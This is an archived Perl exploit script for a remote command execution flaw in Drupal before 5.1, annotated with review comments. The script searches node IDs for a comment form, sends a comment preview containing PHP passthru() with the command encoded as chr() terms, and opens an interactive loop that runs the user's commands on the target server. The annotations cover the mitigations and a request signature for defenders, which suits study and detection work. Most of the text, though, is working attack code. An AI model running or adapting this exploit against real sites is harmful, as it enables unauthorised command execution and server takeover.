#!/usr/bin/perl
#
# $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $
# _drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit
# Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>
#
# Description
# -----------
# Previews on comments were not passed through normal form validation routines,
# enabling users with the 'post comments' permission and access to more than one
# input filter to execute arbitrary code. By default, anonymous and authenticated
# users have access to only one input format.
# Immediate workarounds include: disabling the comment module, revoking the 'post
# comments' permission for all users or limiting access to one input format.
#
# Versions affected
# -----------------
# - Drupal 5.x versions before Drupal 5.1
#
# [02/15/2007] The exploit has been fixed. /str0ke
#
# NOTE(review): archived proof-of-concept for the comment-preview validation
# bypass described above; per the header it is fixed in Drupal 5.1. Read it as
# a record of the attack surface (comment preview + a second input format), not
# as maintained code. Mitigation is the header's own list: upgrade to >= 5.1,
# otherwise disable the comment module, revoke 'post comments', or restrict
# users to a single input format.
# NOTE(review): in this listing every quote appears backslash-escaped (\" and
# \'), which looks like an archive/extraction artifact; the script as printed
# does not parse as Perl until those escapes are removed. Tokens are kept as
# the archive shows them.
# NOTE(review): `use warnings;` is missing; the script relies on `use strict`
# only.
#
use strict;
use LWP::UserAgent;
# Positional CLI arguments: target host (required, else usage() exits), site
# directory (defaults to "/drupal"), optional HTTP proxy as host:port.
# `&usage` without parens is the old call form that also forwards the current @_;
# harmless at file scope but a flagged style.
my $host = shift || &usage;
my $dir = shift || \"/drupal\";
my $proxy = shift;
# Filled from STDIN in the interactive loop below; file-scope so exploit()'s
# own lexical $command shadows it inside the sub.
my $command;
my $conn = LWP::UserAgent->new();
# `unless !$proxy` is a double negative for `if $proxy`.
$conn -> proxy(\"http\", \"http://\".$proxy.\"/\") unless !$proxy;

# Print usage to STDOUT and exit. The trailing spaces in the strings are where
# line breaks presumably were before the listing was collapsed.
# The `()` prototype is decorative here; the caller bypasses it with `&usage`.
sub usage() {
    print \"[?] Drupal < 5.1 Remote Command Execution Exploit \";
    print \"[?] Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com> \";
    print \"[?] usage: perl $0 [host] [directory] [proxy] \";
    print \" [host] (ex. www.milw0rm.com) \";
    print \" [directory] (ex. /drupal) \";
    print \" [proxy] (ex. 0.0.0.0:8080) \";
    exit;
}

# exploit($node_id, $command): POST a comment *preview* (op=Preview comment,
# never a submit) for node $node_id whose body is a PHP tag, and print whatever
# appears between the start_er/end_er markers in the response.
# Uses file-scope $host, $dir and $conn.
# The `()` prototype declares zero arguments; this only works because both
# call sites use `&exploit(...)`, which skips prototype checking.
sub exploit() {
    my $i = $_[0];
    my $command = $_[1] || \'ls -l\';
    # Markers bracket the command so its output can be cut out of the HTML
    # response with the regex below.
    my $cmd = \'echo start_er;\'.$command.\';\'.\'echo end_er\';
    # Each byte of the command becomes a chr(N) term joined with '.', i.e. a
    # PHP string expression that avoids quoting in the form field.
    # Assigning to $_ inside map is a side effect on the unpack() temporaries;
    # a plain `map { 'chr('.$_.')' }` would be the usual form.
    my $byte = join(\'.\', map { $_ = \'chr(\'.$_.\')\' } unpack(\'C*\', $cmd));
    # HTTP::Request is not imported explicitly; presumably loaded via
    # LWP::UserAgent — confirm if this is ever run on a current LWP.
    my $req = HTTP::Request->new(POST => \"http://\" . $host . $dir . \"/?q=comment/reply/\" . $i);
    $req -> content_type(\'application/x-www-form-urlencoded\');
    # format=2 selects the second input format; per the header the flaw needs
    # access to more than one input filter, so this looks like the PHP filter —
    # TODO confirm against a Drupal 5.0 default install.
    # For defenders: the distinguishing request shape is a POST to
    # ?q=comment/reply/<n> carrying op=Preview comment with a PHP open tag in
    # the comment field.
    $req -> content(\'subject=My daddy beats me&comment=<?passthru(\'.$byte.\');?>&format=2&form_id=comment_form&op=Preview comment\');
    my $content = $conn->request($req);
    # /s so the captured output may span lines; /m is unnecessary (no ^/$).
    if ($content->content =~ m/start_er(.*?)end_er/ms) {
        # $1 is copied immediately, as it should be.
        my $out = $1;
        # A command that legitimately prints nothing lands in the else branch
        # and terminates the whole script — "no output" is conflated with
        # "failed".
        if ($out) {
            print \"$out \";
        } else {
            print \"[-] Exploit Failed... \";
            exit;
        }
    }
    # No else: a response without the markers prints nothing and returns.
}

# Probe node ids 1..400 for a page that accepts comments ("add new comment"),
# then use the first match for an interactive loop reading commands from STDIN.
for my $i ( 1 .. 400 ) {
    my $output = $conn -> get(\"http://\" . $host . $dir . \"/?q=comment/reply/\" . $i);
    if($output -> is_success) {
        if($output -> content =~ /add new comment/) {
            print \"[+] found comment/reply: $i \";
            &exploit($i);
            # `while()` with an empty condition loops forever; exit is via the
            # `exit unless $command` line (an empty line — or the input "0",
            # which is also false — ends the session).
            while() {
                print \"str0kin-drupal$ \";
                chomp($command = <STDIN>);
                exit unless $command;
                &exploit($i, $command);
            }
            exit;
        }
    }
}
print \"[-] Exploit Failed... \";